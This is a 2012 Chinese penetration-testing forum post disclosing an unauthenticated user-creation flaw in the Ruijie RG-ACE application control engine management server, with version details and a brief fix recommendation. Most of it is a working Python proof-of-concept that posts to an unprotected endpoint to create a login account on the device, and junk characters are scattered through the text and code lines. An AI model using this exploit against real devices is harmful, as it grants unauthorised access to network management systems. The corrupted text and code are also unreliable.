中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
. y/ b# C- f* Y5 F! o% q( ^# W$ g5 [- j

$ _8 P, @6 T; t8 I# I测试的具体版本是$ W& g9 {' D6 f9 R
产品名称: 锐捷应用控制引擎
0 R7 u, v! w' a& {版本号: 3.1.36.001 TC6 u7 {1 ?- [5 T6 H, S! t  ^
编译时间: 2011042917308 h' x+ g0 v- c, X; }* a6 O

- C9 D3 w+ k/ x9 }' B% W& E# j4 g; P  O& C" L8 S6 e( L- X
漏洞证明:
* v5 |0 E/ ]: Z& s" r0 `" G + d( C9 I7 Y! H7 P  I( ~1 A
+ R  r5 O( K# q# n& F* E. V
1 {0 p! L) Y" S9 _
) E: j5 U4 V; O; X3 Q: s4 Y

: h4 `* G. \/ F" T- d
/ K& \# y7 X/ Z执行脚本$ l. ?  N: D  c9 B- Z) h/ U) ^; P
#! /usr/bin/env python/ M! C% ?( L! t- B& c
#coding=gbk
! s+ N) n) I& W* P& ], {#RG-ACE管理服务器 V3.1.36.0018 ~) s* J* ]( I% [3 G7 ^
import urllib2, urllib,cookielib( s" z+ B& @8 L" s  H
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
/ Y1 p3 ?& \- ]  Yopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
3 K0 v  u1 R5 K' z9 ~, f7 z4 z! @2 Zopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
* {8 ~9 Y; Y8 M/ Qpost=(("event","userManager.doInsertUserInfo"),. A' f$ j/ `1 G
("useractionname","addButtonValue"),6 X9 [( P0 d: e/ @' I% D9 E# r& V
("useropermanager","userManager"),
! q/ o! a: r  h7 Z+ R) A("userName","t"), #######账号自己加
7 @' v7 n7 d& [1 i8 o$ R& i("pwd","aaaaaa"),######密码自己加- {. y# Y5 X3 A6 g! J
("trueName","ad"),
9 j' ]1 k- x" P" v1 [2 _("email",""),
6 D! Z( x" T( U# w3 d+ Z% @("mobilePhone",""),, H8 c9 v8 J" n. M
("officePhone",""),
9 F( n  a! }, H("addr",""),+ Z" E2 X+ L! B$ g9 U; Z" D) A2 ^- g
("submit","确定"))
/ W& ?/ k; y) m" X. a  }urllib2.install_opener(opener)
3 D; {6 Y$ ~2 Rp=urllib2.urlopen(url, urllib.urlencode(post)).read(), d+ g2 O9 z  z7 c# M
print "Done"
% b1 b# f& B+ J5 Y8 P3 K; j: }, p( X
: `- ~9 u4 o' V9 J, Z2 r& J登录,连接设备
! [+ S- n8 g, U0 S- C6 h! s3 a* G  g0 }/ Y  t

# L! N; }9 a* B. T1 s! t3 O5 b# ?: e4 ^+ P
0 U! V1 R( l' \, E

3 A4 L7 T& b# ]% ~1 \4 t默认的管理员admin权限更大点9 R3 l( _+ v1 [' F7 v

+ D8 `5 X" ~7 ~9 U7 C4 B' _! P+ a6 C& f- [: o% `( n5 y9 t( d4 U. o
2 |# N9 V& H3 t2 y

6 y& N  l/ p' N: |2 b1 B7 H* e- `1 F- B9 u: {/ [+ f
修复方案:
; A* `! s0 d8 z, l4 H; V" _加强对接口的权限验证0 ]7 l, r; Q4 }5 `5 z. o: M5 H, n

) C2 V$ e* \6 t( q9 I2 b  ?/ _& w9 F




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2